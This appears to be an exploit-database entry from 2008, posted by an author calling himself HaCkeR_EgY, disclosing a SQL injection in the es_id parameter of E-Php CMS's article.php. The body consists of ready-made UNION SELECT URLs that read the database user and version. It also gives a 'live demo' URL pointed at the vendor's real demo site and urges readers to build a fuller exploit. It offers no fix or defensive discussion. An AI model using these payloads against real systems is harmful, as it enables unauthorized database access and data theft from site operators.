id: 3686
date: 09/17/2008
title: E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability
author: HaCkeR_EgY
cves: 

================================================================
E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability
================================================================


############################################################
############# E-Php Content Management System ######################
## HaCker_Egy ;
===============================================
# Script :  E-Php Content Management System
# Download : http://www.ephpscripts.com
===============================================
# Exploit :
           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
         
     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
    
# live Demo :
             
    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
   
## Note : use your mind to get Full exploit D: 



#  0day.today [2023-03-22]  #